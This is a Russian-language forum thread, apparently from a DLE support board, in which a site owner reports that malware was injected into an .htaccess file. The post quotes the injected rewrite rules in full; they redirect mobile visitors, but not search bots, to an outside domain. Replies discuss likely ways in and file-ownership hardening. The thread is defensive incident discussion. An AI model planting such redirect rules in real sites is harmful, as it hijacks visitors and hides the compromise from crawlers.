kokos2012 0 Опубликовано: 6 июля 2013 Рассказать Опубликовано: 6 июля 2013 Версия: 10.0 (лицензия) Происшествие: 04-05 (июля) 2013 был , каким-то образом, встроен вредоносный код в файл .htaccess RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC] RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC] RewriteRule (.*) http://m.extrasoftware.biz/?19&source=178.159.242.91 [L,R=302] # On Код удален. Запретил изменение файла (полностью...) Есть какие-то соображения, как это могло произойти? P.S. Сам не встраивал, модули не ставил, дыр не добавлял .. P.P.S. Найду - исправлю дыру. Сообщу.. НО - по правилам, сообщил.Заражен только файл .htaccess Цитата Ссылка на сообщение Поделиться на других сайтах
Captain 625 Опубликовано: 6 июля 2013 Рассказать Опубликовано: 6 июля 2013 А при чём тут DLE? 1 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 6 июля 2013 Рассказать Опубликовано: 6 июля 2013 kokos2012, Скорее всего украдены доступы к серверу, либо шелл на сервере, либо через соседние сайты установленные на сервере, вследствие неверно сконфигурированного серверного ПО. Цитата Ссылка на сообщение Поделиться на других сайтах
kokos2012 0 Опубликовано: 7 июля 2013 Рассказать Опубликовано: 7 июля 2013 Автор Серверное ПО на высшем уровне. После проверки - изменение произошло не с сервера. Буду искать, как это сделали. Найду - отпишусь. + проверю access логи Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 7 июля 2013 Рассказать Опубликовано: 7 июля 2013 Серверное ПО на высшем уровне. Я бы на вашем месте не был так уверен и категоричен. Потому что на правильно сконфигурированном ПО не должно быть прав на запись со стороны скриптов на файлы в корне сайта, равно как и на папку корня сайта, соответственно через скрипты записать и изменить что либо в корне сайта нельзя. И если вы выясните что вам изменили файлы через скрипты, а не украли доступы, это уже сразу говорит о серьезных ошибках в конфигурировании сервера. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
edka 0 Опубликовано: 11 июля 2013 Рассказать Опубликовано: 11 июля 2013 (изменено) Потому что на правильно сконфигурированном ПО не должно быть прав на запись со стороны скриптов на файлы в корне сайта, равно как и на папку корня сайта, соответственно через скрипты записать и изменить что либо в корне сайта нельзя. Вопрос новичка: Это значит, что для правильной конфигурации нужно, чтобы владельцы файлов в корне сайта и например файлов в папке кеша были разными или Вы имели ввиду другое? Изменено 11 июля 2013 пользователем edka Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 12 июля 2013 Рассказать Опубликовано: 12 июля 2013 Это значит, что для правильной конфигурации нужно, чтобы владельцы файлов в корне сайта и например файлов в папке кеша были разными или Вы имели ввиду другое? Да верно. На файлы кеша владелец апач или php интерпретатор, а на все остальные файлы владелец должен быть например FTP пользователей или другой , с помощью чего копировались файлы на сервер. И например Апач не должен иметь прав на файлы скопированные на сервер по FTP. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.